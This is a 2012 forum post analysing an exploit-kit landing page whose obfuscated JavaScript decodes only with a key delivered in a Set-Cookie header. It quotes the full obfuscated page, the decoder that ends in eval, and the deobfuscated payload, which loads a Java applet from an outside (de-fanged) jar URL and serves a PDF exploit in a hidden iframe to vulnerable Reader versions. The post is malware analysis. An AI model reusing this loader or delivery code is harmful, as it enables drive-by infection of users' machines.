

Title: Exploit kit requires cookie content for deobfuscation
Post by: SysAdMini on February 24, 2012, 05:53:43 pm
Today I came across an interesting obfuscation.

I discovered the following obfuscated code. It references document.cookie in several places, for example `String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)]`: the twelve characters that follow "a=" in the cookie are used as a property name on String. The decoder therefore depends on a value the server delivers out-of-band (in a Set-Cookie header) rather than anything in the HTML, so the page cannot be deobfuscated from the HTML alone.

Quote
<!-- Obfuscated exploit-kit landing page (quoted sample, reproduced verbatim,
     only re-wrapped and annotated). The payload is spread over 23 elements with
     ids 0yvOj..22yvOj, placed in the DOM in shuffled order, each holding
     'p'-separated decimal character codes. The decoder in the <script> below
     concatenates them in numeric id order; some codes are split across two
     elements (e.g. '17yvOj' ends in "p10" and '18yvOj' starts with "8" -> 108,
     '12yvOj' ends in "p1" and '13yvOj' starts with "05" -> 105). -->
<html><head>
<title></title>
</head><body>
<div id = '22yvOj'>53p108p45p69p107p73p33p71p115p56p124p81p53p108</div>
<div id = '18yvOj'>8p82p75p84p53p93p61p97p108p73p44p63p38p46p43p55p36p95p123p41p98p46p116p89p116p49p84p82p103p98p107p84p97p59p120p60p36p78p115p87p51p90p73p70p108p73p120p73p75p52p100p87p121p52p36p43p86p81p114p6</div>
<span id = '15yvOj'>1p58p72p35p45p96p106p115p56p124p60p122p52p122p55p115p64p61p49p52p88p93p56p83p61p109p88p55p79p109p102p44p94p63p79p105p62p34p56p32p89p116p82p71p80p46p70p108p48p120p70p115p67p108p73p44p73p111p58p108p</span>
<p id = '8yvOj'>p63p74p88p55p97p97p63p113p67p63p78p117p100p43p57p37p54p81p63p117p66p124p70p97p63p113p67p65p78p117p70p36p52p34p70p82p102p112p66p113p61p91p48p122p71p60p43</p>
<div id = '9yvOj'>p96p48p109p71p115p107p90p48p121p56p124p60p116p80p117p57p34p41p91p48p51p90p73p44p122p62p113p71p79p60p98p61p117p53p37p60p83p81p51p74p119p44p98p51p51</div>
<div id = '17yvOj'>p117p110p61p107p65p46p32p60p32p60p43p81p103p49p58p37p119p82p56p96p73p70p108p73p36p52p34p70p84p52p114p110p61p103p81p61p123p119p125p58p91p102p52p46p10</div>
<div id = '7yvOj'>11p117p70p42p101p96p69p122p32p37p32p46p56p53p75p36p88p117p45p34p93p37p101p119p96p59p75p118p113p43p53p118p111p96p48p100p42p88p109p67p32p52p83</div>
<p id = '3yvOj'>5p78p115p101p109p67p32p52p83p63p44p54p125p44p83p102p46p35p118p55p98p58p58p54p122p41p97p62p46p81p111p5</p>
<div id = '19yvOj'>0p55p35p125p40p58p70p32p52p87p63p52p88p60p77p117p100p44p81p46p59p100p102p124p52p34p59p83p114p122p71p54p52p100p38</div>
<span id = '1yvOj'>87p47p34p59p75p86p108p46p120p52p35p59p87p47p73p54p122p59p87p47p70p116p79p94p47p98p67p105p62p83p32p97p60p117p59p87p125p108p82p94p79p88p34p109p57p101p66p90p35p94p</span>
<div id = '2yvOj'>63p102p66p86p124p89p60p111p74p85p61p107p86p118p81p122p44p75p53p108p116p61p92p46p34p60p125p54p108p62p34p56p32p86p116p82p41p55p125p43p99p56p113p65p36p84p101p61p117p71p11</div>
<span id = '14yvOj'>82p60p34p45p84p58p38p88p55p79p108p74p73p81p59p87p108p71p42p81p54p54p79p65p117p58p111p60p93p6</span>
<div id = '4yvOj'>8p81p51p117p73p115p99p110p51p34p71p32p96p123p88p110p52p112p52p93p50p113p65p115p58p79p63p123p69p60p49p92p88p110p66</div>
<div id = '16yvOj'>55p36p110p94p44p84p90p58p120p115p60p68p48p32p70p119p55p92p62p52p90p73p70p108p73p44p73p111p58p108p49</div>
<span id = '5yvOj'>p114p61p92p98p58p61p111p58p110p103p72p67p111p58p79p56p44p65p111p53p83p102p46p67p48p70p100p44p120p72p115p99p110p65p33p70p91p52p85p50p58p104p60p65</span>
<p id = '20yvOj'>p60p48p55p97p108p73p44p63p38p99p94p44p32p70p115p111p92p63p52p63p38p84p88p58p117p65p54p77p115p82p53p108p46p70p108p55p36p57p75p56p79p61p33p56p87p54p98p81p120p7</p>
<div id = '11yvOj'>96p52p110p72p36p45p116p80p33p69p113p77p120p80p58p96p63p41p36p90p109p55p60p56p82p49p51p90p73p44p93p46p35p64p115p54p98p87p110p66p114p65p122</div>
<div id = '10yvOj'>p93p63p79p41p47p58p70p115p60p47p63p34p69p119p42p99p63p113p89p53p48p83p52p115p59p36p77p120p90p53p108p114p84p97p48p34p114p36p60p</div>
<span id = '21yvOj'>3p116p84p88p58p117p65p54p77p115p82p53p108p46p70p108p52p114p81p54p52p100p103p73p105p62p86p117p70p33p71p115p56p33p81p</span>
<p id = '6yvOj'>p52p110p66p56p68p88p37p62p82p99p94p63p83p50p82p59p35p118p59p65p89p94p69p43p63p122p114p33p77p33p1</p>
<p id = '13yvOj'>05p73p44p81p119p46p108p81p52p65p111p62p87p50p109p71p125p58p122p64p33p56p34p103p85p48p122p71p60p49p92p47p113p75p93p46p116p80p</p>
<div id = '12yvOj'>p44p124p67p115p54p82p108p116p60p122p44p116p47p53p108p45p70p108p73p114p72p124p43p98p52p123p65p46p59p98p48p124p98p54p79p1</div>
<div id = '0yvOj'>82p58p111p72p123p45p92p63p58p74p34p49p98p48p52p83p74p117p48p115p81p116p98p70p87p47p73p35p114p46p125p73p116p56p119p47p86p63p73p97p46p63p</div>
<script>
// Decoder. The whole scheme hinges on the property name used to index String:
// 12 characters taken out of document.cookie, which the server sets via a
// Set-Cookie header (see the post). With the expected cookie "a=fromCharCode"
// that name is "fromCharCode". Without the cookie, search() returns -1, the
// substr is empty (or garbage), String[...] is undefined and the first call on
// it below throws a TypeError - so an offline copy of the HTML never decodes.

// Builds the 95-character alphabet of printable ASCII (codes 32..126).
// NOTE: this helper uses the fixed offset substr(2,12), i.e. it assumes the
// cookie string *starts* with "a=", whereas every other call site searches
// for "a=" first. Any cookie placed before "a=" breaks this function.
function LizeDexeq(){
  var PosojEwix="";
  for (var owiDelus=32;owiDelus<127;owiDelus++){
    PosojEwix+=String[document.cookie.substr(2,12)](owiDelus);
  }
  return PosojEwix;
}

// Collects the innerHTML of elements 0yvOj..22yvOj in numeric id order (the
// DOM order above is shuffled) and splits the joined text on 'p' into an
// array of decimal code strings.
function KykIge(){
  var JuhYdo="";
  for (var owiDelus=0;owiDelus<23;owiDelus++){
    JuhYdo+=document.getElementById(owiDelus+'yvOj').innerHTML;
  }
  return JuhYdo.split('p');
}

// Executes the decoded text. WidEh is window (assigned below), so with
// QajiMev == 'al' this resolves window['eval'] and calls it on owiDelus.
function PakOlemen(owiDelus,QajiMev){
  var ZypYcug = WidEh['e'+'v'+QajiMev];
  ZypYcug(owiDelus);
}

// Alphabet-index shift: PosojEwix - QajiMev, and 94-(QajiMev-PosojEwix) when
// that goes negative (the alphabet from LizeDexeq has indices 0..94).
function JuvUja(PosojEwix,QajiMev){
  if (PosojEwix-QajiMev >=0){
    return PosojEwix-QajiMev;
  }else{
    return 94-(QajiMev-PosojEwix);
  }
}

// String.fromCharCode(119,105,110,100,111,119) is "window", so this evaluates
// "WidEh=window". It runs when the script is parsed, i.e. before onload, and
// is the first place a missing cookie makes the page throw.
var WidEh;
eval('WidEh='+String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)](119,105,110,100,111,119));

window.onload = function(){
  var NefaJinu = [76,41,12,49,14,38];   // six-entry key, applied cyclically
  var TajiZune  = LizeDexeq();          // alphabet (printable ASCII)
  var PosojEwix = KykIge();             // encoded character codes
  var ZixEg = 0;                        // index into the key
  var QajiMev = "";                     // decoded script accumulates here
  for ( var owiDelus=0;owiDelus<PosojEwix.length;owiDelus++){
    // code -> character -> position in alphabet -> shift back by the current
    // key byte -> alphabet character at that position.
    QajiMev+=TajiZune.charAt(JuvUja(TajiZune.indexOf(String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)](PosojEwix[owiDelus])),NefaJinu[ZixEg]));
    ZixEg++;
    if (ZixEg == NefaJinu.length){ZixEg = 0;}
  }
  PakOlemen(QajiMev,'al');   // window.eval(decoded script)
}
</script></body></html>

Here is the HTTP response header that sets the cookie. Note that the key travels only in this header; nothing in the HTML body carries it.

Quote
HTTP/1.0 200 OK
Server: nginx/1.0.11
Date: Fri, 24 Feb 2012 13:18:00 GMT
Content-Type: text/html
X-Powered-By: PHP/5.3.9
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: a=fromCharCode
Connection: close

So `document.cookie.substr(document.cookie.search(/a=/i)+2,12)` evaluates to "fromCharCode", and `String[document.cookie.substr(document.cookie.search(/a=/i)+2,12)]` is simply `String['fromCharCode']`.

Two details matter when replaying the sample. First, the alphabet-building helper (`LizeDexeq`) uses the fixed offset `document.cookie.substr(2,12)` instead of searching for "a=", so the decoder only works when the cookie string begins with "a=" (no other cookie may precede it). Second, if the cookie is missing altogether, `String[...]` is undefined and the very first `eval('WidEh='+...)` throws a TypeError while the script is parsed, so a saved copy of the HTML fails before anything is decoded.

This technique defeats static scanners and automated analysis that only look at the HTML body: the 12-character key is delivered in a response header and never appears in the page, so the payload cannot be decoded unless the Set-Cookie header was captured and is replayed as well. It does not hinder a real browser, or a sandbox that replays the full HTTP session, where the cookie is available as usual. When archiving such samples, keep the response headers together with the HTML.

The deobfuscated code contains a Java and a PDF exploit. It writes a hidden `OBJECT` named Pdf1, loads the applet `Photo.class` from `bodun9.jar` (the jar URL below has been de-fanged with spaces), and then decides whether to load `./1a61ad.pdf` in a 1x1 iframe: Firefox and Opera (detected by user-agent substring) get the PDF unconditionally, while other browsers get it only if the `EScript=` version reported by `Pdf1.GetVersions()`, with the dots stripped, is at least 800 — presumably Adobe Reader 8 or later.

Quote
// Deobfuscated payload (quoted verbatim, only re-wrapped and annotated).
// Two delivery paths: a Java applet and a PDF in a hidden iframe. The jar URL
// was de-fanged by the poster with spaces and is kept exactly as posted.

// Hidden ActiveX object. step1() calls Pdf1.GetVersions() on it and parses the
// EScript=/AcroForm= fields of the result, i.e. it is queried as the Adobe
// Reader plugin.
document.write("<OBJECT id=Pdf1 height=0 width=0 classid=clsid:CA8A9780-280D-11CF-A24D-444553540000></OBJECT>");

// Always runs: embeds Photo.class from bodun9.jar with one parameter "p"
// (an opaque string, presumably consumed by the applet), then moves on to the
// PDF decision in step1().
function step0(){
  document.write('<applet code="Photo.class" archive="http:// bablogenerator . in/bodun9.jar"><param name="p" value="vssMlgg.7.yFE6e627sF2PwegFhsPMvM-7cQQfN?Y#L:WW:WQrRpfJj?QJO?WQRWQrp?EccGMc/"></applet>');
  step1();
}

// Loads ./1a61ad.pdf (relative to the landing page) in a 1x1 iframe.
function step3(){
  var d=document.createElement('iframe');
  d.setAttribute('width',1);
  d.setAttribute('height',1);
  d.setAttribute('src','./1a61ad.pdf');
  document.body.appendChild(d);
}

// Decides whether to serve the PDF.
//  - Firefox / Opera (user-agent substring match): PDF served unconditionally.
//  - Otherwise: read the plugin's version string and take the EScript version
//    with the dots removed (e.g. "9.4.1" -> 941, "10.1.0" -> 1010); the PDF is
//    served when that number is >= 800. sv (major version) and lvf (AcroForm
//    version) are computed but never used, and both are assigned without var,
//    i.e. as implicit globals. If the control is absent, or the version
//    string lacks the expected fields, the property access / match()[1]
//    presumably throws and this branch silently aborts without serving the PDF.
function step1(){
  if ((navigator.userAgent.indexOf('Firefox')) != -1 || (navigator.userAgent.indexOf('Opera'))!= -1){
    step3();
  }
  else{
    var lv=Pdf1.GetVersions();
    var fi=/EScript=([^,]+),/;
    var fif=/AcroForm=([^,]+),/;
    lvf=lv.match(fif)[1].split('.');
    lv=lv.match(fi)[1].split('.');
    sv=parseInt(lv[0]);
    lv=parseInt(lv.join(''));
    lvf=parseInt(lvf.join(''));
    if (lv>=800){step3();}
  }
}

step0();